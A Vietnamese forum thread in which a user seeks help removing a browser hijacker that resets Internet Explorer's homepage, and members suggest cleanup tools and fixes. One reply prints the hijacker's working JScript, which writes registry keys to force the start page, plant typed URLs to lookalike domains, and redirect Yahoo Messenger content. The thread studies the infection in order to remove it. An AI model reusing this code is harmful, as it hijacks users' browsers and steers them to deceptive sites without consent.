Trị con này thế nào nhỉ ?

Ngô Duy Biên
(shinichi_bien)

Điều hành viên<br><a href="http://www.hn-ams.org/f
Máy em bị con trojan gì đó mà mỗi lần mở IE là nó vào trang www.vn-n.com
vào options sửa rùi mà restart máy là lại bị
dùng spyware doctor, NAV, Spyware Stomer rùi mà ko được :-/

mọi người chỉ giúp
 
Hehe cái đáng dùng là MS AntiSpyware mà ko thấy chú kể ra :D Nó khôi phục được hijacked homepage mà :D
 
Ngô Duy Biên đã viết:
Máy em bị con trojan gì đó mà mỗi lần mở IE là nó vào trang www.vn-n.com
vào options sửa rùi mà restart máy là lại bị
dùng spyware doctor, NAV, Spyware Stomer rùi mà ko được :-/

mọi người chỉ giúp

Setup ad-aware với spy boot + update đầy đủ. Sau đấy restart = safe mode rồi diệt, hy vọng được :D

Nếu vẫn ko được dùng cái restore của win xem (hy vọng vẫn bật nó đấy chứ??)
 
em sẽ thử cái anh Hà xem thế nào :D
 
Ngô Duy Biên đã viết:
report cho nó thì đợi đến bao h nó giải quyết cho

Nó đưa ra ngay tất cả các vấn đề và cách giải quyết đấy thôi, chắc là chưa thử hử :)|
 
Dùng hijackthis, sau đó post log file lên đây tớ xem thử cho
 
Hơ thế chưa thử cái MS AntiSpyware của anh à? Đã bảo là 1 phát ăn ngay ko tin huh?
 
Thấy cái MS AntiSpyware cũng lâu rùi nhưng đợi bản Stable ra dùng xem sao :D Anh Hà thấy Beta thế nào?
 
Dùng ổn, chả có lỗi gì cho hệ thống cả, khôi phục được homepage ngon lành :D
 
vao` gpedit.msc và regedit để config lại là được ko cần dung` soft
 
Máy em bị con trojan gì đó mà mỗi lần mở IE là nó vào trang www.vn-n.com
vào options sửa rùi mà restart máy là lại bị
dùng spyware doctor, NAV, Spyware Stomer rùi mà ko được

mọi người chỉ giúp
Bản Full TRojan Huntter nè Đại Ca :D
Tính năng:

- Quét và phát hiện các loại Trojan với tốc độ cao.
- Có khả năng phát hiện tất cả các biến thể và các loại Troyjan đặc biệt nhất.
-Quét Registry để phát hiện dấu vết của Trojan
-Quét trong các file để phát hiện dấu vết trong các file cấu hình
-Quét cổng để phát hiện các loại Trojan cư trú tại đây
-Phân tích royjan nâng cao, tính năng phụ, có khả năng phân loại toàn bộ các lớp Trojan
-Tính năng canh phòng "Guard" cho bộ nhớ cư trú- phát hiện tất cả trojan nếu chúng được bát đầu kích hoạt.
-Công cụ Live Update giúp ít tốn công sức khi update qua mạng
-Hỗ trợ giúp đỡ khách hàng trực tuyến- tạo các quy luật phòng thủ theo ý muốn
-Xây dựng trên nestat
-Các file trợ giúp mở rộng
-Hỗ trợ qua email miễn phí
-Thông báo tình trạng cảu tất cả các quá trình hệ thống- loại bỏ Trojan thậm chí khi chúng đang chạy hay đã nhiễm vào quá trình khác
 
oài.. format rồi cài lại win là nhanh nhất . lần sau thì rút kinh nghiệm mà sao lưu trước đi.. đừng để mất bò mới lo làm chuồng
 
var url = "http://www.vn-n.com";
var burl = "http://www.vn-n.com";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\inf\\constants.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\First Home Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url1",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url2","http://hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url3","http://nhantuonghoc.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url4","http://amnhac.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url5","http://game.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url6","http://chat.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url7","http://vuonnhac.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url8","http://thethao.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url9","http://tintuc.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url10","http://amthuc.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url11","http://raovat.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url12","http://ketquabongda.info.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url13","http://photo.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url14","http://ketqua.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url15","http://vuontruyen.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url16","http://googles.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\TypedURLs\\url17","http://timkiem.net.tc");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View \\YMSGR_Launchcast\\content url","http://vnexpress.net.tf");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View \\YMSGR_Calendar\\content url","http://yahoo.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View \\YMSGR_Games\\content url","http://yahoo.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View \\YMSGR_Weather\\content url","http://yahoo.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View \\YMSGR_buzz\\content url","http://yahoo.hongannet.com");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View \\YMSGR_Yahoo360\\content url","http://yahoo.hongannet.com");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows \\CurrentVersion\\URL\\DefaultPrefix\\","http://");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows \\CurrentVersion\\URL\\Prefixes\\www","http://");

Cái đoạn code này sẽ luôn đặt homepage là www.vn-n.com và lưu vào file constants.js trong folder windows\inf.
Em khoái đọc code mấy cái nè lắm :p
 
cái chủ đề này đc post cách đây 1 năm :D mọi người vẫn có hứng thú nhỉ :)):))
 
Back
Bên trên